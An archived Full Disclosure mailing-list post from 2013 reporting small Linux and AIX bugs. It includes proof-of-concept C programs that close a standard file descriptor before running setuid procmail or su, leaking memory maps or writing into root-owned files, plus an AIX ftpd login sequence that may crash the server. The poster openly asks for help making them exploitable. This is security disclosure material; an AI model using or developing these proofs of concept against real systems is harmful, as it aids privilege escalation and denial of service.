
Full Disclosure mailing list archives
Super Tiny Linux and AIX bugs
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Sun, 11 Aug 2013 23:23:21 +0700
Super Tiny Linux and AIX bugs discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013 allowed readers are h4x0rz listening to an arbritrary 2pac song, all others please move along:> uhh, hit em with a little tiny Linux bug.. my tiny Linux bug.. kcope@planetmars:~$ uname -a;cat /etc/debian_version Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux 7.1 kcope@planetmars:~$ cat test99.c #include <fcntl.h> main() { close(0); open("/proc/self/maps", O_RDONLY); execl("/usr/bin/procmail", "procmail", "-d", "kcope", 0); } kcope@planetmars:~$ gcc test99.c -o test99 kcope@planetmars:~$ >/var/mail/kcope kcope@planetmars:~$ ./test99 kcope@planetmars:~$ cat /var/mail/kcope 08048000-0805c000 r-xp 00000000 08:01 144347 /usr/bin/procmail 0805c000-0805d000 r--p 00013000 08:01 144347 /usr/bin/procmail 0805d000-0805e000 rw-p 00014000 08:01 144347 /usr/bin/procmail 08c49000-08c6a000 rw-p 00000000 00:00 0 [heap] b75a8000-b75b2000 r-xp 00000000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so b75b2000-b75b3000 r--p 00009000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so b75b3000-b75b4000 rw-p 0000a000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so b75b4000-b75bd000 r-xp 00000000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so b75bd000-b75be000 r--p 00008000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so b75be000-b75bf000 rw-p 00009000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so b75bf000-b75d2000 r-xp 00000000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so b75d2000-b75d3000 r--p 00012000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so b75d3000-b75d4000 rw-p 00013000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so b75d4000-b75d6000 rw-p 00000000 00:00 0 b75d6000-b75dc000 r-xp 00000000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so b75dc000-b75dd000 r--p 00005000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so b75dd000-b75de000 rw-p 00006000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so b75de000-b75e0000 rw-p 00000000 00:00 0 b75e0000-b773c000 r-xp 00000000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so b773c000-b773d000 ---p 0015c000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so b773d000-b773f000 r--p 0015c000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so b773f000-b7740000 rw-p 0015e000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so b7740000-b7743000 rw-p 00000000 00:00 0 b7743000-b7767000 r-xp 00000000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so b7767000-b7768000 r--p 00023000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so b7768000-b7769000 rw-p 00024000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so b776e000-b7770000 rw-p 00000000 00:00 0 b7770000-b7771000 r-xp 00000000 00:00 0 [vdso] b7771000-b778d000 r-xp 00000000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so b778d000-b778e000 r--p 0001b000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so b778e000-b778f000 rw-p 0001c000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so bfd62000-bfd83000 rw-p 00000000 00:00 0 [stack] geez! leeks process maps of setuid root executable. should investigate deeper.. kcope@planetmars:~$ cat test99.c #include <fcntl.h> main() { close(2); open("/proc/self/comm", O_RDWR); execl("/bin/su", "su", 0); } kcope@planetmars:~$ ./test99 kcope@planetmars:~$ ps aux|grep su root 12 0.0 0.0 0 0 ? S 14:19 0:00 [sync_supers] root 6543 0.0 0.4 4240 1128 pts/0 S+ 17:58 0:00 su kcope 6545 0.0 0.3 3568 820 pts/1 S+ 17:58 0:00 grep su You got mail in /var/mail/kcope !! kcope@planetmars:~$ ls -la /proc/6543/comm -rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm kcope@planetmars:~$ cat /proc/6543/comm Password: its writing supplied input to root owned files! can somebody, hello lists, give me pointers about how to exploit this, if possible. i know this might an issue for vuln-dev but I m a rude boy! another tiny bug in aix ftpd kcope@planetmars:~$ nc <ip> 21 220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready. user ftp 331 Guest login ok, send ident as password. pass ftp 230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars 230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars 230 Guest login ok, access restrictions apply. user root 421 ftpd: get_auth_methods() failed: Bad file number 421 root cannot authenticate to server connection closes and ftpd might coredump.. can somebody please truss the process and tell me what file it want to open? this might be exploitable. thanks alot! /Kctherootkey _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Super Tiny Linux and AIX bugs king cope (Aug 11)